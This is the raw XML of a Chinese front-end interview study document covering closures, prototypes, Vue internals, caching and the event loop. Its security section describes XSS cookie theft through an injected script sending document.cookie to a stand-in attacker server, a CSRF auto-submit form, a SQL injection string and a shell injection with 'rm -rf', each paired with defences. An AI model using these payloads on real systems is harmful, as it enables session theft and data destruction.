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说说你对闭包的理解？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什么是闭包：闭包是能够访问另一个函数作用域的函数，一般是在函数内部返回一个函数，返回的函数引用外部函数的变量，形成闭包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闭包的应用场景：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1.1.模仿块级作用域：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avascript不会告诉你变量是否已经被声明，容易造成命名冲突，如果是在全局环境定义的变量，就会污染全局环境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这种情况下可以用匿名函数立即执行形成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块级作用域防止全局污染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存储变量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javascript中函数作用域链的特点，内部函数保留了对外部函数的活动变量的引用，所以变量不会被释放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可以用于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存储变量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1.3封装私有变量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javascript中没有私有成员的概念，我们可以把函数当做一个范围，函数内的变量就是私有变量，在外部无法引用，比如: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E9ECE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E9ECEF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>function C(a,b)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E9ECEF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill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E9ECEF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E9ECE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E9ECEF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>var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E9ECEF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> c = a - b 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E9ECEF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E9ECE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E9ECEF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>return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E9ECEF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> c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E9ECEF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js原型连的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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每个函数都有一个prototype属性，当new一个对象的时候每个对象都会继承prototype里面的属性，每个实例里面有一个__proto__ 属性指向prototype，函数构造函数指向</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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Person === Person.prototype.constructor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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在查找属性的时候会先查找实例上面的属性，在查找原型链上面的属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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原型链继承：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function inherits(Child, Parent)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var F = function () {};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F.prototype = Parent.prototype;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Child.prototype = new F();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Child.prototype.constructor = Child;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js判断数组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Array.isArray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arr instanceof Array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arr.__proto__ == Array.prototype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arr.__proto__.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constructor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== Array v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vue双向绑定原理是？vue双向绑定对数组的拦截</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="330"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双向绑定参照视频源代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="330"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利用defineProporty对传进来的data属性都定义了get和set来监听属性的变化，当属性变化时，可以通知需要更新的地方做更新</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="330"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vue双向绑定对数组的拦截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obarr = []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arrayProto = Array.prototype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//缓存原来的方法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arrayMethods = Object.create(arrayProto)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Object.defineProperty(arrayMethods,'push',{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value:function mutator(){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//缓存原生方法，之后调用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original = arrayProto['push']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args = Array.from(arguments)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original.apply(this,args)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console.log(obarr)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obarr.__proto__ = arrayMethods;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="330"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vue中的组件间通讯有几种方式？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5.1 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2F2F2"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>props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/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2F2F2"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>$emit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5.2 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2F2F2"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>$emit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/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2F2F2"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>$on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这种方法通过一个空的Vue实例作为中央事件总线（事件中心），用它来触发事件和监听事件,巧妙而轻量地实现了任何组件间的通信，包括父子、兄弟、跨级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。当我们的项目比较大时，可以选择更好的状态管理解决方案vuex。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1.具体实现方式：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Event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=new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Vue();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Event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.$emit(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事件名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Event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.$on(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事件名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data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=&gt;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5.3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vuex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5.4 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2F2F2"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>$attrs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/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2F2F2"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>$listeners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$attrs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：包含了父作用域中不被 prop 所识别 (且获取) 的特性绑定 (class 和 style 除外)。当一个组件没有声明任何 prop 时，这里会包含所有父作用域的绑定 (class 和 style 除外)，并且可以通过 v-bind="$attrs" 传入内部组件。通常配合 interitAttrs 选项一起使用。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$listeners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：包含了父作用域中的 (不含 .native 修饰器的) v-on 事件监听器。它可以通过 v-on="$listeners" 传入内部组件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接下来我们看个跨级通信的例子：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index.vue&lt;template&gt;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&lt;h2&gt;浪里行舟&lt;/h2&gt;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&lt;child-com1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:foo="foo"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:boo="boo"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:coo="coo"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:doo="doo"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title="前端工匠"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&gt;&lt;/child-com1&gt;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&lt;/div&gt;&lt;/template&gt;&lt;script&gt;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const childCom1 = () =&gt; import("./childCom1.vue");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export default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components: { childCom1 },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foo: "Javascript",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boo: "Html",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coo: "CSS",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doo: "Vue"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};&lt;/script&gt;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childCom1.vue&lt;template class="border"&gt;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&lt;p&gt;foo: {{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foo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}}&lt;/p&gt;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&lt;p&gt;childCom1的$attrs: {{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$attrs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}}&lt;/p&gt;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&lt;child-com2 v-bind="$attrs"&gt;&lt;/child-com2&gt;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&lt;/div&gt;&lt;/template&gt;&lt;script&gt;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const childCom2 = () =&gt; import("./childCom2.vue");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export default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childCom2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inheritAttrs: false, // 可以关闭自动挂载到组件根元素上的没有在props声明的属性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props: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foo: String // foo作为props属性绑定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created()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console.log(this.$attrs); // { "boo": "Html", "coo": "CSS", "doo": "Vue", "title": "前端工匠" }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};&lt;/script&gt;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childCom2.vue&lt;template&gt;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&lt;div class="border"&gt;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&lt;p&gt;boo: {{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boo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}}&lt;/p&gt;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&lt;p&gt;childCom2: {{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$attrs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}}&lt;/p&gt;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&lt;child-com3 v-bind="$attrs"&gt;&lt;/child-com3&gt;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&lt;/div&gt;&lt;/template&gt;&lt;script&gt;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const childCom3 = () =&gt; import("./childCom3.vue");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export default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childCom3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inheritAttrs: false,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props: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boo: String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created()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console.log(this.$attrs); // {  "coo": "CSS", "doo": "Vue", "title": "前端工匠" }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};&lt;/script&gt;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childCom3.vue&lt;template&gt;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&lt;div class="border"&gt;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&lt;p&gt;childCom3: {{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$attrs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}}&lt;/p&gt;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&lt;/div&gt;&lt;/template&gt;&lt;script&gt;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export default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props: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coo: String,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title: String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};&lt;/script&gt;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.为什么for循环的时候建议加上key？diff算法？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diff算法策略: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6.1同层比较，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先比较类型，类型不一样就直接删除，换上新的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比较属性有没有不同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再往下递归比较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6.2通过key加快同层查找比较，如果没有key的话只能删除插入了，操作会大大增加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6.3多个状态更新setState合并成一个更新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vue-router中的路由守卫有那些，怎么用来做权限认证？权限怎么做到按钮级别的控制？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7.1全局路由守卫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//判断如果没有登录可以在这个地方跳转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//next(‘/login’)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Router.beforeResolve((to,from,next)=&gt;{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//就是执行时间比routerEach慢一点其他的一样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//这个可以不用next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Router.afterEach((to,from,next)=&gt;{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7.2路由里部守卫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Path:’/b/:id’,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Name:’home’,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beforeEnter(to,from,next){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//在beforeEach之后，beforeResolve之前执行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Path:’test’,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7.3组件内部守卫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beforeRouteEnter(to,from,next){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beforeRouteUpdate(to,from,next){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beforeRouteLeave(to,from,next){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一次路由过程的具体的执行顺序是beforeEach beforeEnter beforeRouteEnter beforeResolve  afterEach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.vue中的nextTick一般什么时候用到？怎么实现的？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通常nextTick用于数据赋值后，又想立刻取到dom更新的时候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属于微任务更新的，但是有兼容问题，会降级到宏任务setTimeout中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降级顺序：Promise &gt; MutationObs erver &gt; setImmediate &gt; setTimeout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vuex的原理的了解？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在vue.use(Vuex)的时候调用vuex中的install方法，执行代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0" w:firstLine="630" w:firstLineChars="3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Vue.mixin({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beforeCreate() {//所有组件的beforeCreate钩子都会执行这个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(this.$options &amp;&amp; this.$options.store) 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//找到根组件 main 上面挂一个$store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this.$store = this.$options.store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console.log(this.$store);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//非根组件指向其父组件的$store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this.$store = this.$parent &amp;&amp; this.$parent.$store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可见，store注入 vue的实例组件的方式，是通过vue的 mixin机制，借助vue组件的生命周期 钩子 beforeCreate 完成的。即 每个vue组件实例化过程中，会在 beforeCreate 钩子前调用 vuexInit 方法，在组件中添加了$store变量，然后：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6F6F6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6F6F6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>// store._vm._data.$$state = store.state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6F6F6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6F6F6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">  store._vm = new Vue({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6F6F6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6F6F6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">    data: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6F6F6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6F6F6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">      $$state: state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6F6F6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6F6F6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6F6F6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6F6F6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">    computed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6F6F6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添加一个对象，把$store.state变成一个vue对象，现实全局的响应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.Vue3.0新特性是是什么？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10.1体积减少到10k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10.2 Object.defineProperty -&gt; Proxy，proxy不需要对原始对象做太多操作，减少复杂度，增加可维护性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target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name: 'poetries'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logHandler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get: function(target, key)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console.log(`${key} 被读取`);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target[key];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set: function(target, key, value)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console.log(`${key} 被设置为 ${value}`);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target[key] = value;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targetWithLog = new Proxy(target, logHandler);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targetWithLog.name; // 控制台输出：name 被读取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targetWithLog.name = 'others'; // 控制台输出：name 被设置为 others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console.log(target.name); // 控制台输出: others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9.3.更换成typescript来编写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&lt;keep-alive&gt;&lt;/keep-alive&gt;的作用是什么?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="210" w:leftChars="100" w:firstLine="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keep-alive是Vue提供的一个抽象组件，用来对组件进行缓存，从而节省性能，由于是一个抽象组件，所以在v页面渲染完毕后不会被渲染成一个DOM元素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11"/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&lt;keep-alive&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="819" w:firstLineChars="39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&lt;loading&gt;&lt;/loading&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="4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&lt;/keep-laive&gt;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利用include、exclude属性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进行缓存控制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&lt;keep-alive include="bookLists,bookLists"&gt;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&lt;router-view&gt;&lt;/router-view&gt;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&lt;/keep-alive&gt;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&lt;keep-alive exclude="indexLists"&gt;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&lt;router-view&gt;&lt;/router-view&gt;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&lt;/keep-alive&gt;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include属性表示只有name属性为bookLists，bookLists的组件会被缓存，（注意是组件的名字，不是路由的名字）其它组件不会被缓存exclude属性表示除了name属性为indexLists的组件不会被缓存，其它组件都会被缓存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ind w:firstLine="4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ind w:firstLine="4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动画方式？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12.1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javascript直接实现；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12.2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SVG（可伸缩矢量图形）；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12.3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CSS3 transition；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12.4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CSS3 animation；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12.5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Canvas动画；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12.6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requestAnimationFrame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参考下面文档：https://www.cnblogs.com/zhaowy/p/8817944.html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移动端自适应方案你们是怎么做的？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="21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用根元素rem的方法，假定给定设计稿宽为750px，根元素html的font-size属性假定为100px（方便计算），那么1rem = 100px,总的宽度就为7.5rem了，如果有一个容器宽度是200px，用rem单位表示就是2rem（就是除以100），那如果是其他设计搞呢例如640宽度的呢？关键是要计算640宽度下面html的font-size的值，可以用以下方式计算：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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(750/100 = 640 /x ) ==&gt; x = 640*100/750 = 640/7.5 = 85.3px</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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页面加载的时候用下面的js推算出不同的宽度下的html的font-size的值：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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Document.querySelector(“html”).style.fontSize = document.documentElement.clientWidth / 7.5 + 'px' </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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210"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这样其宽度的设计稿就和750的设计稿有等比关系了，用750的设计稿搞好一套代码其他就自动适应了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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参考下面文章：http://caibaojian.com/mobile-responsive-example.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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.前端性能优化你们是怎么做的？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.页面间的通信方式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15.1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WebSocket，接口支持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15.2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cookie/localStorage/sessionStorage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//page1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localStorage.setItem('message',JSON.stringify({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message: '消息'，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from: 'Page 1',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date: Date.now()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//pageb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window.addEventListener("storage", function(e)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console.log(e.key, e.newValue, e.oldValue)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15.3 indexDB：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//创建数据：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request = indexedDB.open('myDatabase', 3);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db = e.target.result;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tx = db.transaction('Users','readwrite');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tx.objectStore('Users');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保存数据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reqAdd = store.add({'userId': 1, 'userName': '李白', 'age': 24});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reqAdd.addEventListener('success',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console.log('保存成功')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//获取数据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request = indexedDB.open('myDatabase', 3);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db = e.target.result;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tx = db.transaction('Users','readwrite');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tx.objectStore('Users');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获取数据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reqGet = store.get(1);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reqGet.addEventListener('success',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console.log(this.result.userName);    // 李白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15.4 postMessage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在主页发送消息：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iframe = document.getElementById('iframe_id');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iframe_cw = iframe.contentWindow;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window.onload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iframe_cw.postMessage({height:"300px"}, "*"); //通信 * 可以指定域名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//子页面接受：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window.addEventListener('message', function (event)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document.getElementById('messageHTML').innerText = event.data.height;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//子页面发送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event.source.postMessage({height:c_h}, 'http://127.0.0.1');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false);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15.5 window.open，iframe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15.6 Broadcast Channel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//Page1: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channel = new BroadcastChannel("channel-BroadcastChannel");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channel.postMessage('Hello, BroadcastChannel!')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//page2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channel = new BroadcastChannel("channel-BroadcastChannel");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channel.addEventListener("message", function(ev)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console.log(ev.data)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一般开发中实现跨域有几种方式？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前端安全性的了解？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17.1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xss ：如果网页可以运行外部输入的脚本，黑客会运行一个自己的脚本例如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&lt;scritp src=’....index.js’&gt;&lt;/script&gt; (http://locahost:8080?from=&lt;scritp src=’....index.js’&gt;&lt;/script&gt; 可以把这个连接搞成短链形式欺骗用户)  index.js 里面：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image = new Image(); image.src=’http://loadhost:4000/img?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href=window.location.href &amp;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c=’+document.cookie,发送一个请求到黑客服务器，可以用nodejs和中间件取得cookie，然后黑客就去目标网站直接在浏览器里面输入document.cookie=cookir  就可以完全模拟用户登录了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还有一个可能是在评论里面注入例如：发表一个评论：我来了&lt;scritp src=’....index.js’&gt;&lt;/script&gt;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所有登录这个网站看到这个评论的人的cookie信息会被窃取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防范措施：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17.1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1.一般来说这种攻击框架层面上就已经有防范了。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17.1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2.ctx.set(“X-XSS-Protection”,0),浏览器自动拦截3. ctx.set('Content-Security-Policy', "default-src 'self'") 只加载本站的脚本。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17.1     3.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通过写函数转换&lt; &gt; &amp; 等符号。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17.1   4.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通过xss库转换 var xss = require(‘xss’);  var html = xss(“&lt;h1&gt;&lt;/h1&gt;&lt;script&gt;*****&lt;/script&gt;”)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17.1  5.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设置httpOnly:true,表示不能通过控制台修改cookie   app.use(session({httpOnly:true}, app));  另外一种设置方式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Response.addHeader(“set-cookie”,”uid-112;path=/ HttpOnly”)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210" w:firstLineChars="1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17.2 csrf  跨站伪造请求，意思是在a网站没有退出的情况下，b网站利用&lt;form name="form" action="http://localhost:3000/updateText" method="post" target=“csrf”&gt; 添加评论: &lt;input type="text" name="text" value="CSRF评论。。" /&gt; &lt;/form&gt;   然后提交 document.querySelector('form').submit();  这里action请求就会带上cookie请求成功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防范：1可以用 头信息里的 referer（请求来源），但是这个方案不太爱完美2.验证码方式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17.3 点击劫持，黑客通过在自己的网站上加上目标网站的iframe连接，经过精确定位控制目标网站的按钮在诱导按钮上面。隐藏iframe，点击诱导按钮就点击了目标网站的功能了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防范：中间键中加载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await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17.4 sql注入：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填⼊特殊密码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1'or'1'='1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拼接后的SQL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SELECT *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FROM test.user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WHERE username = 'laowang'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AND password = '1'or'1'='1'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这样就可以不用密码也登录了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防范：一般调用封装好的方法：query(‘SELECT * FROM WHERE ID=?’,PASSWORD)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17.5 OS 攻击 一般执行shell 命令的时候有可能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例如执行下面这个exe(‘ git clone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"http://***"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http://***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&amp;&amp; rm -rf  &amp;&amp; /’)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17.6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DNS劫持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顾名思义，DNS服务器(DNS解析各个步骤)被篡改，修改了域名解析的结果，使得访问到的不是预期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防范：升级https、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18.前端缓存理解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18.1.强缓存：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当浏览器第一次请求服务器的时候，服务器返回的响应头里面包含一个Cache-Control的字段，一般是设置成（'Cache-Control'：'max-age=60'），告诉浏览器本地缓存这个页面60秒，再次请求页面的时候，如果没有过期就用浏览器本地和缓存，不用强缓存的时候就返回'Cache-Control'：'no-cache'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18.2协议缓存（对比缓存）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服务器返回给浏览器'Last-Modified':value,或者'Etag'：value ，浏览器识别这两个字段，当再次请求的时候就分别带上if-modified-since，if-none-match给服务器，服务器找到对应的文件，对比文件信息，如果都相等证明没有修改，返回状态304给浏览器，如果是更新了就返回新文件给浏览器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.加密传输这块，http和https有什么不一样？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.还有没有长列表优化经验？是怎么优化长列表的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.用nodejs做过后端么，nodejs有那些核心模块？了解eventLoop，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eventLoop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在主要ui+js线程外面，遇到事件，定时器，异步请求，这些会独立开一个新的线程，这些线程任务执行完毕会把回调函数会放到一个回调队列里面，当主线程的同步代码执行完毕以后，event loop 会遍历回调队列，按照先进先出的顺序执行回调，每次执行完主线程的代码，都会通过event loop检查回调队列，执行回调，process.nextTick()是把代码放到当前同步代码的后面（注意和宏任务和微任务的区别）,stack队列后面还有一个taskqueue队列，主要用于放置微任务（想异步执行，又想尽快执行），先于callback queue执行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3040" cy="39890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.小程序开发中有没有遇到什么问题？怎么解决的？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76EFA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="80176E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0A590F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C10A590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">
    <w:nsid w:val="C8EBFEB7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C8EBFEB7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BE92566"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3BE9256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C37A62A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4C37A62A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5F0E1CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65F0E1CF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21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1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1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1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1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1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1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1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12E13"/>
    <w:rsid w:val="04774CF5"/>
    <w:rsid w:val="06401461"/>
    <w:rsid w:val="07647861"/>
    <w:rsid w:val="09535D1E"/>
    <w:rsid w:val="0C5F6FA1"/>
    <w:rsid w:val="0DC1557D"/>
    <w:rsid w:val="11C01A92"/>
    <w:rsid w:val="1CC11891"/>
    <w:rsid w:val="1D80449E"/>
    <w:rsid w:val="2DB84082"/>
    <w:rsid w:val="34251184"/>
    <w:rsid w:val="38C467E8"/>
    <w:rsid w:val="3A1831FD"/>
    <w:rsid w:val="3F6238F6"/>
    <w:rsid w:val="3FB4459A"/>
    <w:rsid w:val="43171635"/>
    <w:rsid w:val="43504BDB"/>
    <w:rsid w:val="4595122E"/>
    <w:rsid w:val="45E0284B"/>
    <w:rsid w:val="46483870"/>
    <w:rsid w:val="490663E4"/>
    <w:rsid w:val="4D306375"/>
    <w:rsid w:val="5585326E"/>
    <w:rsid w:val="5BB232A8"/>
    <w:rsid w:val="60DE49A6"/>
    <w:rsid w:val="6AD36F73"/>
    <w:rsid w:val="6C622FB7"/>
    <w:rsid w:val="71623E28"/>
    <w:rsid w:val="76CF2CEE"/>
    <w:rsid w:val="7AA6341F"/>
    <w:rsid w:val="7E5F1F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狂力伟</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-02T01:36:50Z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